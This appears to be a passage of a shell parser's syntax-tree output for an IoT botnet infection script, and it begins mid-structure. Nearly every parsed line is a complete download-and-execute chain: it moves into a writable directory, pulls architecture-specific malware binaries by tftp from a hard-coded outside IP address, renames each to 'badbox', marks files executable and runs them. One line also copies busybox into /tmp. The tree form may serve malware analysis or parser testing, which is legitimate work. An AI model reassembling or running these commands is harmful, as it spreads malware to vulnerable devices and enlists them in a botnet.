  OperatorNode(lineno=15, op=';', pos=(1495, 1496)),
  CommandNode(lineno=15, pos=(1496, 1504), parts=[
    WordNode(lineno=15, pos=(1496, 1504), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1505, 1631), parts=[
  CommandNode(lineno=16, pos=(1505, 1512), parts=[
    WordNode(lineno=16, pos=(1505, 1507), word='cd'),
    WordNode(lineno=16, pos=(1508, 1512), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1513, 1515)),
  CommandNode(lineno=16, pos=(1516, 1527), parts=[
    WordNode(lineno=16, pos=(1516, 1518), word='cd'),
    WordNode(lineno=16, pos=(1519, 1527), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1528, 1530)),
  CommandNode(lineno=16, pos=(1531, 1538), parts=[
    WordNode(lineno=16, pos=(1531, 1533), word='cd'),
    WordNode(lineno=16, pos=(1534, 1538), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1539, 1541)),
  CommandNode(lineno=16, pos=(1542, 1550), parts=[
    WordNode(lineno=16, pos=(1542, 1544), word='cd'),
    WordNode(lineno=16, pos=(1545, 1550), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1551, 1553)),
  CommandNode(lineno=16, pos=(1554, 1558), parts=[
    WordNode(lineno=16, pos=(1554, 1556), word='cd'),
    WordNode(lineno=16, pos=(1557, 1558), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1558, 1559)),
  CommandNode(lineno=16, pos=(1560, 1591), parts=[
    WordNode(lineno=16, pos=(1560, 1564), word='tftp'),
    WordNode(lineno=16, pos=(1565, 1576), word='208.67.1.36'),
    WordNode(lineno=16, pos=(1577, 1579), word='-c'),
    WordNode(lineno=16, pos=(1580, 1583), word='get'),
    WordNode(lineno=16, pos=(1584, 1591), word='telnetd'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1591, 1592)),
  CommandNode(lineno=16, pos=(1592, 1611), parts=[
    WordNode(lineno=16, pos=(1592, 1595), word='cat'),
    WordNode(lineno=16, pos=(1596, 1603), word='telnetd'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1605, 1611), word='badbox'), pos=(1604, 1611), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1611, 1612)),
  CommandNode(lineno=16, pos=(1612, 1622), parts=[
    WordNode(lineno=16, pos=(1612, 1617), word='chmod'),
    WordNode(lineno=16, pos=(1618, 1620), word='+x'),
    WordNode(lineno=16, pos=(1621, 1622), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1622, 1623)),
  CommandNode(lineno=16, pos=(1623, 1631), parts=[
    WordNode(lineno=16, pos=(1623, 1631), word='./badbox'),
  ]),
])
CommandNode(lineno=17, pos=(1632, 1662), parts=[
  WordNode(lineno=17, pos=(1632, 1634), word='cp'),
  WordNode(lineno=17, pos=(1635, 1647), word='/bin/busybox'),
  WordNode(lineno=17, pos=(1648, 1650), word='-O'),
  WordNode(lineno=17, pos=(1651, 1662), word='/tmp/badbox'),
])
ListNode(lineno=18, pos=(1663, 1744), parts=[
  CommandNode(lineno=18, pos=(1663, 1699), parts=[
    WordNode(lineno=18, pos=(1663, 1667), word='tftp'),
    WordNode(lineno=18, pos=(1668, 1679), word='208.67.1.36'),
    WordNode(lineno=18, pos=(1680, 1682), word='-c'),
    WordNode(lineno=18, pos=(1683, 1686), word='get'),
    WordNode(lineno=18, pos=(1687, 1699), word='jackmymipsel'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(1699, 1700)),
  CommandNode(lineno=18, pos=(1700, 1724), parts=[
    WordNode(lineno=18, pos=(1700, 1703), word='cat'),
    WordNode(lineno=18, pos=(1704, 1716), word='jackmymipsel'),
    RedirectNode(lineno=18, output=
      WordNode(lineno=18, pos=(1718, 1724), word='badbox'), pos=(1717, 1724), type='>'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(1724, 1725)),
  CommandNode(lineno=18, pos=(1725, 1735), parts=[
    WordNode(lineno=18, pos=(1725, 1730), word='chmod'),
    WordNode(lineno=18, pos=(1731, 1733), word='+x'),
    WordNode(lineno=18, pos=(1734, 1735), word='*'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(1735, 1736)),
  CommandNode(lineno=18, pos=(1736, 1744), parts=[
    WordNode(lineno=18, pos=(1736, 1744), word='./badbox'),
  ]),
])
ListNode(lineno=19, pos=(1745, 1822), parts=[
  CommandNode(lineno=19, pos=(1745, 1779), parts=[
    WordNode(lineno=19, pos=(1745, 1749), word='tftp'),
    WordNode(lineno=19, pos=(1750, 1761), word='208.67.1.36'),
    WordNode(lineno=19, pos=(1762, 1764), word='-c'),
    WordNode(lineno=19, pos=(1765, 1768), word='get'),
    WordNode(lineno=19, pos=(1769, 1779), word='jackmymips'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(1779, 1780)),
  CommandNode(lineno=19, pos=(1780, 1802), parts=[
    WordNode(lineno=19, pos=(1780, 1783), word='cat'),
    WordNode(lineno=19, pos=(1784, 1794), word='jackmymips'),
    RedirectNode(lineno=19, output=
      WordNode(lineno=19, pos=(1796, 1802), word='badbox'), pos=(1795, 1802), type='>'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(1802, 1803)),
  CommandNode(lineno=19, pos=(1803, 1813), parts=[
    WordNode(lineno=19, pos=(1803, 1808), word='chmod'),
    WordNode(lineno=19, pos=(1809, 1811), word='+x'),
    WordNode(lineno=19, pos=(1812, 1813), word='*'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(1813, 1814)),
  CommandNode(lineno=19, pos=(1814, 1822), parts=[
    WordNode(lineno=19, pos=(1814, 1822), word='./badbox'),
  ]),
])
ListNode(lineno=20, pos=(1823, 1898), parts=[
  CommandNode(lineno=20, pos=(1823, 1856), parts=[
    WordNode(lineno=20, pos=(1823, 1827), word='tftp'),
    WordNode(lineno=20, pos=(1828, 1839), word='208.67.1.36'),
    WordNode(lineno=20, pos=(1840, 1842), word='-c'),
    WordNode(lineno=20, pos=(1843, 1846), word='get'),
    WordNode(lineno=20, pos=(1847, 1856), word='jackmysh4'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(1856, 1857)),
  CommandNode(lineno=20, pos=(1857, 1878), parts=[
    WordNode(lineno=20, pos=(1857, 1860), word='cat'),
    WordNode(lineno=20, pos=(1861, 1870), word='jackmysh4'),
    RedirectNode(lineno=20, output=
      WordNode(lineno=20, pos=(1872, 1878), word='badbox'), pos=(1871, 1878), type='>'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(1878, 1879)),
  CommandNode(lineno=20, pos=(1879, 1889), parts=[
    WordNode(lineno=20, pos=(1879, 1884), word='chmod'),
    WordNode(lineno=20, pos=(1885, 1887), word='+x'),
    WordNode(lineno=20, pos=(1888, 1889), word='*'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(1889, 1890)),
  CommandNode(lineno=20, pos=(1890, 1898), parts=[
    WordNode(lineno=20, pos=(1890, 1898), word='./badbox'),
  ]),
])
ListNode(lineno=21, pos=(1899, 1974), parts=[
  CommandNode(lineno=21, pos=(1899, 1932), parts=[
    WordNode(lineno=21, pos=(1899, 1903), word='tftp'),
    WordNode(lineno=21, pos=(1904, 1915), word='208.67.1.36'),
    WordNode(lineno=21, pos=(1916, 1918), word='-c'),
    WordNode(lineno=21, pos=(1919, 1922), word='get'),
    WordNode(lineno=21, pos=(1923, 1932), word='jackmyx86'),
  ]),
  OperatorNode(lineno=21, op=';', pos=(1932, 1933)),
  CommandNode(lineno=21, pos=(1933, 1954), parts=[
    WordNode(lineno=21, pos=(1933, 1936), word='cat'),
    WordNode(lineno=21, pos=(1937, 1946), word='jackmyx86'),
    RedirectNode(lineno=21, output=
      WordNode(lineno=21, pos=(1948, 1954), word='badbox'), pos=(1947, 1954), type='>'),
  ]),
  OperatorNode(lineno=21, op=';', pos=(1954, 1955)),
  CommandNode(lineno=21, pos=(1955, 1965), parts=[
    WordNode(lineno=21, pos=(1955, 1960), word='chmod'),
    WordNode(lineno=21, pos=(1961, 1963), word='+x'),
    WordNode(lineno=21, pos=(1964, 1965), word='*'),
  ]),
  OperatorNode(lineno=21, op=';', pos=(1965, 1966)),
  CommandNode(lineno=21, pos=(1966, 1974), parts=[
    WordNode(lineno=21, pos=(1966, 1974), word='./badbox'),
  ]),
])
ListNode(lineno=22, pos=(1975, 2054), parts=[
  CommandNode(lineno=22, pos=(1975, 2010), parts=[
    WordNode(lineno=22, pos=(1975, 1979), word='tftp'),
    WordNode(lineno=22, pos=(1980, 1991), word='208.67.1.36'),
    WordNode(lineno=22, pos=(1992, 1994), word='-c'),
    WordNode(lineno=22, pos=(1995, 1998), word='get'),
    WordNode(lineno=22, pos=(1999, 2010), word='jackmyarmv6'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(2010, 2011)),
  CommandNode(lineno=22, pos=(2011, 2034), parts=[
    WordNode(lineno=22, pos=(2011, 2014), word='cat'),
    WordNode(lineno=22, pos=(2015, 2026), word='jackmyarmv6'),
    RedirectNode(lineno=22, output=
      WordNode(lineno=22, pos=(2028, 2034), word='badbox'), pos=(2027, 2034), type='>'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(2034, 2035)),
  CommandNode(lineno=22, pos=(2035, 2045), parts=[
    WordNode(lineno=22, pos=(2035, 2040), word='chmod'),
    WordNode(lineno=22, pos=(2041, 2043), word='+x'),
    WordNode(lineno=22, pos=(2044, 2045), word='*'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(2045, 2046)),
  CommandNode(lineno=22, pos=(2046, 2054), parts=[
    WordNode(lineno=22, pos=(2046, 2054), word='./badbox'),
  ]),
])
ListNode(lineno=23, pos=(2055, 2132), parts=[
  CommandNode(lineno=23, pos=(2055, 2089), parts=[
    WordNode(lineno=23, pos=(2055, 2059), word='tftp'),
    WordNode(lineno=23, pos=(2060, 2071), word='208.67.1.36'),
    WordNode(lineno=23, pos=(2072, 2074), word='-c'),
    WordNode(lineno=23, pos=(2075, 2078), word='get'),
    WordNode(lineno=23, pos=(2079, 2089), word='jackmyi686'),
  ]),
  OperatorNode(lineno=23, op=';', pos=(2089, 2090)),
  CommandNode(lineno=23, pos=(2090, 2112), parts=[
    WordNode(lineno=23, pos=(2090, 2093), word='cat'),
    WordNode(lineno=23, pos=(2094, 2104), word='jackmyi686'),
    RedirectNode(lineno=23, output=
      WordNode(lineno=23, pos=(2106, 2112), word='badbox'), pos=(2105, 2112), type='>'),
  ]),
  OperatorNode(lineno=23, op=';', pos=(2112, 2113)),
  CommandNode(lineno=23, pos=(2113, 2123), parts=[
    WordNode(lineno=23, pos=(2113, 2118), word='chmod'),
    WordNode(lineno=23, pos=(2119, 2121), word='+x'),
    WordNode(lineno=23, pos=(2122, 2123), word='*'),
  ]),
  OperatorNode(lineno=23, op=';', pos=(2123, 2124)),
  CommandNode(lineno=23, pos=(2124, 2132), parts=[
    WordNode(lineno=23, pos=(2124, 2132), word='./badbox'),
  ]),
])
ListNode(lineno=24, pos=(2133, 2216), parts=[
  CommandNode(lineno=24, pos=(2133, 2170), parts=[
    WordNode(lineno=24, pos=(2133, 2137), word='tftp'),
    WordNode(lineno=24, pos=(2138, 2149), word='208.67.1.36'),
    WordNode(lineno=24, pos=(2150, 2152), word='-c'),
    WordNode(lineno=24, pos=(2153, 2156), word='get'),
    WordNode(lineno=24, pos=(2157, 2170), word='jackmypowerpc'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(2170, 2171)),
  CommandNode(lineno=24, pos=(2171, 2196), parts=[
    WordNode(lineno=24, pos=(2171, 2174), word='cat'),
    WordNode(lineno=24, pos=(2175, 2188), word='jackmypowerpc'),
    RedirectNode(lineno=24, output=
      WordNode(lineno=24, pos=(2190, 2196), word='badbox'), pos=(2189, 2196), type='>'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(2196, 2197)),
  CommandNode(lineno=24, pos=(2197, 2207), parts=[
    WordNode(lineno=24, pos=(2197, 2202), word='chmod'),
    WordNode(lineno=24, pos=(2203, 2205), word='+x'),
    WordNode(lineno=24, pos=(2206, 2207), word='*'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(2207, 2208)),
  CommandNode(lineno=24, pos=(2208, 2216), parts=[
    WordNode(lineno=24, pos=(2208, 2216), word='./badbox'),
  ]),
])
ListNode(lineno=25, pos=(2217, 2294), parts=[
  CommandNode(lineno=25, pos=(2217, 2251), parts=[
    WordNode(lineno=25, pos=(2217, 2221), word='tftp'),
    WordNode(lineno=25, pos=(2222, 2233), word='208.67.1.36'),
    WordNode(lineno=25, pos=(2234, 2236), word='-c'),
    WordNode(lineno=25, pos=(2237, 2240), word='get'),
    WordNode(lineno=25, pos=(2241, 2251), word='jackmyi586'),
  ]),
  OperatorNode(lineno=25, op=';', pos=(2251, 2252)),
  CommandNode(lineno=25, pos=(2252, 2274), parts=[
    WordNode(lineno=25, pos=(2252, 2255), word='cat'),
    WordNode(lineno=25, pos=(2256, 2266), word='jackmyi586'),
    RedirectNode(lineno=25, output=
      WordNode(lineno=25, pos=(2268, 2274), word='badbox'), pos=(2267, 2274), type='>'),
  ]),
  OperatorNode(lineno=25, op=';', pos=(2274, 2275)),
  CommandNode(lineno=25, pos=(2275, 2285), parts=[
    WordNode(lineno=25, pos=(2275, 2280), word='chmod'),
    WordNode(lineno=25, pos=(2281, 2283), word='+x'),
    WordNode(lineno=25, pos=(2284, 2285), word='*'),
  ]),
  OperatorNode(lineno=25, op=';', pos=(2285, 2286)),
  CommandNode(lineno=25, pos=(2286, 2294), parts=[
    WordNode(lineno=25, pos=(2286, 2294), word='./badbox'),
  ]),
])
ListNode(lineno=26, pos=(2295, 2372), parts=[
  CommandNode(lineno=26, pos=(2295, 2329), parts=[
    WordNode(lineno=26, pos=(2295, 2299), word='tftp'),
    WordNode(lineno=26, pos=(2300, 2311), word='208.67.1.36'),
    WordNode(lineno=26, pos=(2312, 2314), word='-c'),
    WordNode(lineno=26, pos=(2315, 2318), word='get'),
    WordNode(lineno=26, pos=(2319, 2329), word='jackmym86k'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(2329, 2330)),
  CommandNode(lineno=26, pos=(2330, 2352), parts=[
    WordNode(lineno=26, pos=(2330, 2333), word='cat'),
    WordNode(lineno=26, pos=(2334, 2344), word='jackmym86k'),
    RedirectNode(lineno=26, output=
      WordNode(lineno=26, pos=(2346, 2352), word='badbox'), pos=(2345, 2352), type='>'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(2352, 2353)),
  CommandNode(lineno=26, pos=(2353, 2363), parts=[
    WordNode(lineno=26, pos=(2353, 2358), word='chmod'),
    WordNode(lineno=26, pos=(2359, 2361), word='+x'),
    WordNode(lineno=26, pos=(2362, 2363), word='*'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(2363, 2364)),
  CommandNode(lineno=26, pos=(2364, 2372), parts=[
    WordNode(lineno=26, pos=(2364, 2372), word='./badbox'),
  ]),
])
ListNode(lineno=27, pos=(2373, 2452), parts=[
  CommandNode(lineno=27, pos=(2373, 2408), parts=[
    WordNode(lineno=27, pos=(2373, 2377), word='tftp'),
    WordNode(lineno=27, pos=(2378, 2389), word='208.67.1.36'),
    WordNode(lineno=27, pos=(2390, 2392), word='-c'),
    WordNode(lineno=27, pos=(2393, 2396), word='get'),
    WordNode(lineno=27, pos=(2397, 2408), word='jackmysparc'),
  ]),
  OperatorNode(lineno=27, op=';', pos=(2408, 2409)),
  CommandNode(lineno=27, pos=(2409, 2432), parts=[
    WordNode(lineno=27, pos=(2409, 2412), word='cat'),
    WordNode(lineno=27, pos=(2413, 2424), word='jackmysparc'),
    RedirectNode(lineno=27, output=
      WordNode(lineno=27, pos=(2426, 2432), word='badbox'), pos=(2425, 2432), type='>'),
  ]),
  OperatorNode(lineno=27, op=';', pos=(2432, 2433)),
  CommandNode(lineno=27, pos=(2433, 2443), parts=[
    WordNode(lineno=27, pos=(2433, 2438), word='chmod'),
    WordNode(lineno=27, pos=(2439, 2441), word='+x'),
    WordNode(lineno=27, pos=(2442, 2443), word='*'),
  ]),
  OperatorNode(lineno=27, op=';', pos=(2443, 2444)),
  CommandNode(lineno=27, pos=(2444, 2452), parts=[
    WordNode(lineno=27, pos=(2444, 2452), word='./badbox'),
  ]),
])
